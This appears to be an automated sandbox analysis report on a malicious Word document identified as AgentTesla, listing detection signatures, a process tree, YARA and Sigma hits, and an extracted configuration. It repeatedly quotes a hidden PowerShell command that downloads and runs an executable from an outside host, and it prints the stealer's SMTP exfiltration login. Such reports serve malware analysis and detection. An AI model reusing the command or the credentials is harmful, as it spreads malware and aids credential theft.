Loading ...

Play interactive tourEdit tour

Windows Analysis Report 478644.doc

Overview

General Information

Sample Name:478644.doc
Analysis ID:553100
MD5:c0f8f2fc481e9be7141d84b401edf1f7
SHA1:ab1dbe841b083ea886c9023307c0527f7bfbfff3
SHA256:4b0d21f58347c62f76445c6aa17a21dd00970f235734a1d1db4a40ee5a8b7c45
Tags:doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Yara detected AgentTesla
Sigma detected: Powershell download and execute file
Document exploit detected (creates forbidden files)
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Document contains OLE streams with names of living off the land binaries
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Yara detected Costura Assembly Loader
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Document contains a stream with embedded javascript code
Injects a PE file into a foreign processes
Powershell drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Found suspicious RTF objects
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Sigma detected: Verclsid.exe Runs COM Object
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Sigma detected: PowerShell Download from URL
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2724 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 2904 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 1308 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 292 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • okcff.exe (PID: 2656 cmdline: "C:\Users\user\AppData\Roaming\okcff.exe" MD5: E9416A322E9A796D45588BC4FB04CD45)
        • cmd.exe (PID: 2028 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1972 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2104 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2060 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 1864 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2100 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 1892 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2780 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2712 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2228 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 448 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 2632 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2792 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1188 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 836 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1308 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • cmd.exe (PID: 2424 cmdline: "C:\Windows\System32\cmd.exe" /C timeout 2 MD5: AD7B9C14083B52BC532FBA5948342B98)
          • timeout.exe (PID: 1204 cmdline: timeout 2 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
        • okcff.exe (PID: 2176 cmdline: C:\Users\user\AppData\Roaming\okcff.exe MD5: E9416A322E9A796D45588BC4FB04CD45)
    • verclsid.exe (PID: 2432 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 2652 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "hisgraceinme@yandex.com", "Password": "newyear2022", "Host": "smtp.yandex.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000005.00000002.438152998.00000000003A0000.00000004.00000020.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
          • 0x325b:$sb1: -W Hidden
          • 0x324b:$sc1: -NoP
          • 0x3255:$sd1: -NonI
          • 0x3265:$se3: -ExecutionPolicy bypass
          • 0x3250:$sf1: -sta
          Click to see the 24 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          41.0.okcff.exe.400000.9.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            41.0.okcff.exe.400000.9.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              41.0.okcff.exe.400000.13.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                41.0.okcff.exe.400000.13.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  9.2.okcff.exe.3605ff0.7.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 26 entries

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Change PowerShell Policies to a Unsecure LevelShow sources
                    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: PowerShell DownloadFileShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe', ProcessId: 2904
                    Sigma detected: Verclsid.exe Runs COM ObjectShow sources
                    Source: Process startedAuthor: Victor Sergeev, oscd.community: Data: Command: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046}